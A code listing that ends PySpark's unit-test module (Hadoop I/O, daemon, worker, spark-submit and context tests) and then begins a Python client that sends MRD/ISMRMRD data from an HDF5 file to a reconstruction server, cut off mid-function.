en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.assertEqual(nulls, en)
maps = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect())
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.assertEqual(maps, em)
# arrays get pickled to tuples by default
tuples = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable").collect())
et = [(1, ()),
(2, (3.0, 4.0, 5.0)),
(3, (4.0, 5.0, 6.0))]
self.assertEqual(tuples, et)
# with custom converters, primitive arrays can stay as arrays
arrays = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
ea = [(1, array('d')),
(2, array('d', [3.0, 4.0, 5.0])),
(3, array('d', [4.0, 5.0, 6.0]))]
self.assertEqual(arrays, ea)
clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable").collect())
ec = (u'1',
{u'__class__': u'org.apache.spark.api.python.TestWritable',
u'double': 54.0, u'int': 123, u'str': u'test1'})
self.assertEqual(clazz[0], ec)
unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable",
batchSize=1).collect())
self.assertEqual(unbatched_clazz[0], ec)
def test_oldhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
oldconf = {"mapred.input.dir": hellopath}
hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=oldconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
newconf = {"mapred.input.dir": hellopath}
hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=newconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newolderror(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_bad_inputs(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.sequenceFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.NotValidWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
maps = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
keyConverter="org.apache.spark.api.python.TestInputKeyConverter",
valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect())
em = [(u'\x01', []),
(u'\x01', [3.0]),
(u'\x02', [1.0]),
(u'\x02', [1.0]),
(u'\x03', [2.0])]
self.assertEqual(maps, em)
class OutputFormatTests(ReusedPySparkTestCase):
def setUp(self):
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
def tearDown(self):
shutil.rmtree(self.tempdir.name, ignore_errors=True)
def test_sequencefiles(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/")
ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect())
self.assertEqual(ints, ei)
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/")
doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect())
self.assertEqual(doubles, ed)
ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))]
self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/")
bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect())
self.assertEqual(bytes, ebs)
et = [(u'1', u'aa'),
(u'2', u'bb'),
(u'3', u'cc')]
self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/")
text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect())
self.assertEqual(text, et)
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/")
bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect())
self.assertEqual(bools, eb)
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/")
nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect())
self.assertEqual(nulls, en)
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/")
maps = sorted(self.sc.sequenceFile(basepath + "/sfmap/").collect())
self.assertEqual(maps, em)
def test_oldhadoop(self):
basepath = self.tempdir.name
dict_data = [(1, {}),
(1, {"row1": 1.0}),
(2, {"row2": 2.0})]
self.sc.parallelize(dict_data).saveAsHadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable")
result = sorted(self.sc.hadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect())
self.assertEqual(result, dict_data)
conf = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.MapWritable",
"mapred.output.dir": basepath + "/olddataset/"
}
self.sc.parallelize(dict_data).saveAsHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/olddataset/"}
old_dataset = sorted(self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
conf=input_conf).collect())
self.assertEqual(old_dataset, dict_data)
def test_newhadoop(self):
basepath = self.tempdir.name
data = [(1, ""),
(1, "a"),
(2, "bcdf")]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
self.assertEqual(result, data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.Text",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=input_conf).collect())
self.assertEqual(new_dataset, data)
def test_newhadoop_with_array(self):
basepath = self.tempdir.name
# use custom ArrayWritable types and converters to handle arrays
array_data = [(1, array('d')),
(1, array('d', [1.0, 2.0, 3.0])),
(2, array('d', [3.0, 4.0, 5.0]))]
self.sc.parallelize(array_data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
self.assertEqual(result, array_data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset(
conf,
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter",
conf=input_conf).collect())
self.assertEqual(new_dataset, array_data)
def test_newolderror(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/newolderror/saveAsHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/newolderror/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat"))
def test_bad_inputs(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/badinputs/saveAsHadoopFile/",
"org.apache.hadoop.mapred.NotValidOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/badinputs/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
data = [(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/converters/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
keyConverter="org.apache.spark.api.python.TestOutputKeyConverter",
valueConverter="org.apache.spark.api.python.TestOutputValueConverter")
converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect())
expected = [(u'1', 3.0),
(u'2', 1.0),
(u'3', 2.0)]
self.assertEqual(converted, expected)
def test_reserialization(self):
basepath = self.tempdir.name
x = range(1, 5)
y = range(1001, 1005)
data = zip(x, y)
rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y))
rdd.saveAsSequenceFile(basepath + "/reserialize/sequence")
result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect())
self.assertEqual(result1, data)
rdd.saveAsHadoopFile(
basepath + "/reserialize/hadoop",
"org.apache.hadoop.mapred.SequenceFileOutputFormat")
result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect())
self.assertEqual(result2, data)
rdd.saveAsNewAPIHadoopFile(
basepath + "/reserialize/newhadoop",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect())
self.assertEqual(result3, data)
conf4 = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/dataset"}
rdd.saveAsHadoopDataset(conf4)
result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect())
self.assertEqual(result4, data)
conf5 = {"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/newdataset"}
rdd.saveAsNewAPIHadoopDataset(conf5)
result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect())
self.assertEqual(result5, data)
def test_unbatched_save_and_read(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei, len(ei)).saveAsSequenceFile(
basepath + "/unbatched/")
unbatched_sequence = sorted(self.sc.sequenceFile(
basepath + "/unbatched/",
batchSize=1).collect())
self.assertEqual(unbatched_sequence, ei)
unbatched_hadoopFile = sorted(self.sc.hadoopFile(
basepath + "/unbatched/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
batchSize=1).collect())
self.assertEqual(unbatched_hadoopFile, ei)
unbatched_newAPIHadoopFile = sorted(self.sc.newAPIHadoopFile(
basepath + "/unbatched/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
batchSize=1).collect())
self.assertEqual(unbatched_newAPIHadoopFile, ei)
oldconf = {"mapred.input.dir": basepath + "/unbatched/"}
unbatched_hadoopRDD = sorted(self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=oldconf,
batchSize=1).collect())
self.assertEqual(unbatched_hadoopRDD, ei)
newconf = {"mapred.input.dir": basepath + "/unbatched/"}
unbatched_newAPIHadoopRDD = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=newconf,
batchSize=1).collect())
self.assertEqual(unbatched_newAPIHadoopRDD, ei)
def test_malformed_RDD(self):
basepath = self.tempdir.name
# non-batch-serialized RDD[[(K, V)]] should be rejected
data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]]
rdd = self.sc.parallelize(data, len(data))
self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile(
basepath + "/malformed/sequence"))
class DaemonTests(unittest.TestCase):
def connect(self, port):
from socket import socket, AF_INET, SOCK_STREAM
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', port))
# send a split index of -1 to shutdown the worker
sock.send("\xFF\xFF\xFF\xFF")
sock.close()
return True
def do_termination_test(self, terminator):
from subprocess import Popen, PIPE
from errno import ECONNREFUSED
# start daemon
daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py")
daemon = Popen([sys.executable, daemon_path], stdin=PIPE, stdout=PIPE)
# read the port number
port = read_int(daemon.stdout)
# daemon should accept connections
self.assertTrue(self.connect(port))
# request shutdown
terminator(daemon)
time.sleep(1)
# daemon should no longer accept connections
try:
self.connect(port)
except EnvironmentError as exception:
self.assertEqual(exception.errno, ECONNREFUSED)
else:
self.fail("Expected EnvironmentError to be raised")
def test_termination_stdin(self):
"""Ensure that daemon and workers terminate when stdin is closed."""
self.do_termination_test(lambda daemon: daemon.stdin.close())
def test_termination_sigterm(self):
"""Ensure that daemon and workers terminate on SIGTERM."""
from signal import SIGTERM
self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM))
class WorkerTests(PySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
self.sc.parallelize(range(1)).foreach(sleep)
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
data = open(path).read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(range(100), 1)
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write("Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(range(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.isAlive())
self.assertEqual(100000, rdd.count())
class SparkSubmitTests(unittest.TestCase):
def setUp(self):
self.programDir = tempfile.mkdtemp()
self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit")
def tearDown(self):
shutil.rmtree(self.programDir)
def createTempFile(self, name, content):
"""
Create a temp file with the given name and content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
path = os.path.join(self.programDir, name)
with open(path, "w") as f:
f.write(content)
return path
def createFileInZip(self, name, content):
"""
Create a zip archive containing a file with the given content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
path = os.path.join(self.programDir, name + ".zip")
zip = zipfile.ZipFile(path, 'w')
zip.writestr(name, content)
zip.close()
return path
def test_single_script(self):
"""Submit and test a single script file"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect()
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out)
def test_script_with_local_functions(self):
"""Submit and test a single script file calling a global function"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 3
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(foo).collect()
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[3, 6, 9]", out)
def test_module_dependency(self):
"""Submit and test a script with a dependency on another module"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(myfunc).collect()
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out)
def test_module_dependency_on_cluster(self):
"""Submit and test a script with a dependency on another module on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(myfunc).collect()
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master",
"local-cluster[1,1,512]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out)
def test_single_script_on_cluster(self):
"""Submit and test a single script on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 2
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(foo).collect()
""")
# this will fail if you have different spark.executor.memory
# in conf/spark-defaults.conf
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,512]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out)
class ContextTests(unittest.TestCase):
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
@unittest.skipIf(not _have_scipy, "SciPy not installed")
class SciPyTests(PySparkTestCase):
"""General PySpark tests that depend on scipy """
def test_serialize(self):
from scipy.special import gammaln
x = range(1, 5)
expected = map(gammaln, x)
observed = self.sc.parallelize(x).map(gammaln).collect()
self.assertEqual(expected, observed)
@unittest.skipIf(not _have_numpy, "NumPy not installed")
class NumPyTests(PySparkTestCase):
"""General PySpark tests that depend on numpy """
def test_statcounter_array(self):
x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])])
s = x.stats()
self.assertSequenceEqual([2.0, 2.0], s.mean().tolist())
self.assertSequenceEqual([1.0, 1.0], s.min().tolist())
self.assertSequenceEqual([3.0, 3.0], s.max().tolist())
self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist())
if __name__ == "__main__":
if not _have_scipy:
print "NOTE: Skipping SciPy tests as it does not seem to be installed"
if not _have_numpy:
print "NOTE: Skipping NumPy tests as it does not seem to be installed"
unittest.main()
if not _have_scipy:
print "NOTE: SciPy tests were skipped as it does not seem to be installed"
if not _have_numpy:
print "NOTE: NumPy tests were skipped as it does not seem to be installed"
|
client.py
|
#!/usr/bin/python3
# from server import Server
import argparse
import logging
import datetime
import h5py
import socket
import sys
import ismrmrd
import multiprocessing
from connection import Connection
import time
import os
defaults = {
'address': 'localhost',
'port': 9002,
'outfile': 'out.h5',
'out_group': str(datetime.datetime.now()),
'config': 'default.xml',
'send_waveforms': False
}
def connection_receive_loop(sock, outfile, outgroup, verbose, logfile, recvAcqs, recvImages, recvWaveforms):
"""Start a Connection instance to receive data, generally run in a separate thread"""
if verbose:
verbosity = logging.DEBUG
else:
verbosity = logging.INFO
if logfile:
logging.basicConfig(filename=logfile, format='%(asctime)s - %(message)s', level=verbosity)
logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))
else:
logging.basicConfig(format='%(asctime)s - %(message)s', level=verbosity)
incoming_connection = Connection(sock, True, outfile, "", outgroup)
try:
for msg in incoming_connection:
if msg is None:
break
finally:
try:
sock.shutdown(socket.SHUT_RDWR)
except:
pass
sock.close()
logging.debug("Socket closed (reader)")
# Dataset may not be closed properly if a close message is not received
try:
incoming_connection.dset.close()
except:
pass
recvAcqs.value = incoming_connection.recvAcqs
recvImages.value = incoming_connection.recvImages
recvWaveforms.value = incoming_connection.recvWaveforms
def main(args):
# ----- Load and validate file ---------------------------------------------
if (args.config_local):
if not os.path.exists(args.config_local):
logging.error("Could not find local config file %s", args.config_local)
return
dset = h5py.File(args.filename, 'r')
if not dset:
logging.error("Not a valid dataset: %s" % args.filename)
return
dsetNames = dset.keys()
logging.info("File %s contains %d groups:", args.filename, len(dset.keys()))
print(" ", "\n ".join(dsetNames))
if not args.in_group:
if len(dset.keys()) == 1:
args.in_group = list(dset.keys())[0]
else:
logging.error("Input group not specified and multiple groups are present")
return
if args.in_group not in dset:
logging.error("Could not find group %s", args.in_group)
return
group = dset.get(args.in_group)
logging.info("Reading data from group '%s' in file '%s'", args.in_group, args.filename)
# ----- Determine type of data stored --------------------------------------
# Raw data is stored as:
# /group/config text of recon config parameters (optional)
# /group/xml text of ISMRMRD flexible data header
# /group/data array of IsmsmrdAcquisition data + header
# /group/waveforms array of waveform (e.g. PMU) data
# Image data is stored as:
# /group/config text of recon config parameters (optional)
# /group/xml text of ISMRMRD flexible data header (optional)
# /group/image_0/data array of IsmrmrdImage data
# /group/image_0/header array of ImageHeader
# /group/image_0/attributes text of image MetaAttributes
isRaw = False
isImage = False
hasWaveforms = False
if ( ('data' in group) and ('xml' in group) ):
isRaw = True
else:
isImage = True
imageNames = group.keys()
logging.info("Found %d image sub-groups: %s", len(imageNames), ", ".join(imageNames))
# print(" ", "\n ".join(imageNames))
for imageName in imageNames:
if ((imageName == 'xml') or (imageName == 'config') or (imageName == 'config_file')):
continue
image = group[imageName]
if not (('data' in image) and ('header' in image) and ('attributes' in image)):
isImage = False
if ('waveforms' in group):
hasWaveforms = True
dset.close()
if ((isRaw is False) and (isImage is False)):
logging.error("File does not contain properly formatted MRD raw or image data")
return
# ----- Open connection to server ------------------------------------------
# Spawn a thread to connect and handle incoming data
logging.info("Connecting to MRD server at %s:%d" % (args.address, args.port))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((args.address, args.port))
recvAcqs = multiprocessing.Value('i', 0)
recvImages = multiprocessing.Value('i', 0)
recvWaveforms = multiprocessing.Value('i', 0)
process = multiprocessing.Process(target=connection_receive_loop, args=(sock, args.outfile, args.out_group, args.verbose, args.logfile, recvAcqs, recvImages, recvWaveforms))
process.daemon = True
process.start()
# This connection is only used for outgoing data. It should not be used for
# writing to the HDF5 file as multi-threading issues can occur
connection = Connection(sock, False)
# --------------- Send config -----------------------------
if (args.config_local):
fid = open(args.config_local, "r")
config_text = fid.read()
fid.close()
logging.info("Sending local config file '%s' with text:", args.config_local)
logging.info(config_text)
connection.send_config_text(config_text)
else:
logging.info("Sending remote config file name '%s'", args.config)
connection.send_config_file(args.config)
dset = ismrmrd.Dataset(args.filename, args.in_group, False)
# --------------- Send MRD metadata -----------------------
groups = dset.list()
if ('xml' in groups):
xml_header = dset.read_xml_header()
xml_header = xml_header.decode("utf-8")
else:
logging.warning("Could not find MRD metadata xml in file")
xml_header = "Dummy XML header"
connection.send_metadata(xml_header)
# --------------- Send waveform data ----------------------
# TODO: Interleave waveform and other data so they arrive chronologically
if hasWaveforms:
